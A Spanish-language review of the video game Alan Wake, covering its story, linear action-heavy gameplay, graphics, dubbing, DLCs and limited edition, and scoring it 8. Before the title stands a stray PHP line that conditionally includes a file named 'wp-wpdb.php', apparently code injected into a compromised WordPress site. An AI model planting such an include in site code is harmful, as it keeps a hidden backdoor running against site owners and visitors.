if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Alan Wake (Análisis) una aventura de novela – La Fortaleza de LeChuck

Alan Wake (Análisis) una aventura de novela

Alan Wake fue uno de los títulos más esperados para Xbox 360 del año pasado. Mientras estaba en producción, saltaban detalles de su trama y gráficos que hacian esperar que sería un trabajo sobresaliente de la compañía Remedy. Recuerdo que la primera vez que lo probé fue en el Salón del Cómic de Barcelona, donde habían montado un habitáculo oscuro para sumergirte aún más si cabe en el mundo de luz y oscuridad de Alan Wake.
¡Vaya hacia la luz! la luz le salvará, señor Wake

Alan Wake es un escritor popular de novelas de misterio pero se haya inmerso en un bloqueo literario donde no es capaz de escribir ni una sola linea, para solucionarlo, su esposa, Alice, dedice llevarlo de vacaciones a un pueblecito del norte llamado Bright Falls, para alejarle de la ajetreada vida neoyorkina y así despertar su inspiración. La cosa se tuerce cuando Alice coloca dentro de la cabaña donde se alojan una máquina de escribir, lo cual provoca el enfado de Alan, que sale al exterior. De repente, escucha los gritos de su esposa que se hunde en lo profundo del Lago. Alan se lanza al agua para rescatarla pero despierta en un coche accidentado, en la oscuridad de una carretera y cerca de él una hoja de un manuscrito que no recuerda haber mecanografiado.

Ese lago me da mala espina
En la aventura manejamos al personaje en tercera persona por las diferentes zonas del pueblo, mientras se combinan los momentos de luz, donde consciente trataremos de investigar la desparición de su mujer, con los de oscuridad, en los que principalmente huiremos de las sombras que nos acechan con nuestra mejor arma, la linterna. Lamentablemente, el juego es muy lineal, cosa que nadie se esperaba en un principio, y los momentos de acción son bastante más elevados que los de investigación, por lo que se puede confundir con un simple survival horror.

A nivel gráfico Alan Wake es una maravilla, gráficos inmejorables y la atmósfera muy conseguida del tenebroso pueblo de Bright Falls. Los detalles visuales tan trabajandos son dignos de en un episodio de una serie de misterio estadounidense. Otro aspecto a destacar es el guión denso y cuidado, de esos que últimamente es difícil encontrar, y equiparable al de una novela del mismo Stephen King. Escucharemos a Alan narrarnos en voz en off los sucesos que van aconteciendo en cada episodio de los que está dividido el juego.
Espero que hayas cogido pilas de repuesto…
En el aspecto sonoro, sentiremos el tenso sonido ambiente, pasos, ruidos mecánicos, crujidos de muebles… y ligeras melodías para fomentar el pánico y alertarnos de que hay algo ahí fuera.
El juego está doblado completamente al castellano y cuenta con dobladores televisivos de lujo, que han trabajado en series como Lost (Perdidos) y que hacen creíble la historia: Alan Wake es doblado por Lorenzo Beteta (Fox Mulder, Jack Shepard…), Alice Wake por Conchi López (Juliet), Odín por Luis Mas (John Locke) entre otros que podéis ver en el making off en este video.
En las fechas en las que Alan Wake estaba a punto de lanzarse, se crearon 6 curiosos mini episodios de 5 minutos con actores reales. En ellos se narraban los hechos que tienen lugar antes del juego a modo de introducción. Desde Xbox live, cada semana aproximadamente, se podía visualizar un episodio en VOSE, y la verdad es que no estaban nada mal y conseguían incrementar las ganas de tener el título entre las manos.
Han aparecido 2 DLC, el primero es el títulado «La señal«, gratuíto para los que adquirieron el juego, y que da comienzo justo después del final. La historia transcurre con relacion a la trama inicial, se nos ofrecen nuevas pistas para comprender mejor los sucesos, pero bastante confusas por lo que da la sensación de encontrarnos con una historia paralela. Los escenarios, armas, texturas, etc. son totalmente recicladas, y su desarrollo es practicamente en modo nocturno. El segundo DLC de Alan Wake es «El escritor«, en esta ocasión realizaremos una incursión en el interior del protagonista para descubrir nuevos giros argumentales, que más que traer algo en claro, volveran más compleja aún la historia. Tiene un precio de 560 Microsoft Points, vosotros decidís si realmente vale la pena.
Remedy Entertainment es el responsable de Alan Wake. Entre sus trabajos encontramos Max Payne y la segunda parte de este. Con Alan Wake se esperaba un gran éxito de ventas, pero al final se quedaron en aceptables. Hace poco confirmaron que están preparando Alan Wake: Night Springs (nombre del programa de los televisores de las casas abandonadas) e insisten que no se trata de una continuación. De momento, todo está por ver.
Alan Wake es en definitiva una gran historia dotada de fuerte carga literaria, donde se nos van dando las piezas que deberemos ordenar para resolver el misterio. Peca de lineal, de incluir demasiada acción y unos giros finales que restan peso a la trama, pero aún así vale la pena jugarlo y más ahora que tiene un precio de risa, sino mirad en zavvies.
Aún no me voy sin contaros, que si os he convencido para que le echéis un vistazo, no tengo más remedio que recomendaros encarecidamente la Edición Limitada de Alan Wake porque es una delicia:

Esta edición incluye:
– El disco de Alan Wake en una caja diseñada con arte exclusivo.
– Comentarios en audio con trucos y más por parte de los desarrolladores de Remedy.
– Un libro de 144 páginas llamado “The Alan Wake Files”, con la introducción a la historia de Alan Wake y documentos del FBI en torno a los eventos de Bright Falls.
– Disco exclusivo con el audio/banda sonora del juego.
– Un código exclusivo de la versión para la descarga del primer contenido adicional a través de Xbox LIVE.
– Contenido exclusivo de la edición limitada para el Xbox 360: Un tema y las vestimentas para Avatares de Alan Wake.

Ahora si, feliz estancia en Bright Falls.

Stephen King dijo una vez que las pesadillas no están sujetas a la lógica, no tiene sentido explicarlas. La explicación es la antítesis de la lírica del miedo. En una historia de terror la víctima no deja de preguntarse “¿por qué?”, sin embargo no hay explicación, no debería haberla. El misterio sin respuesta es el que perdura, el que siempre acabamos recordando. Me llamo Alan Wake. Soy escritor.

Puntuación Global: 8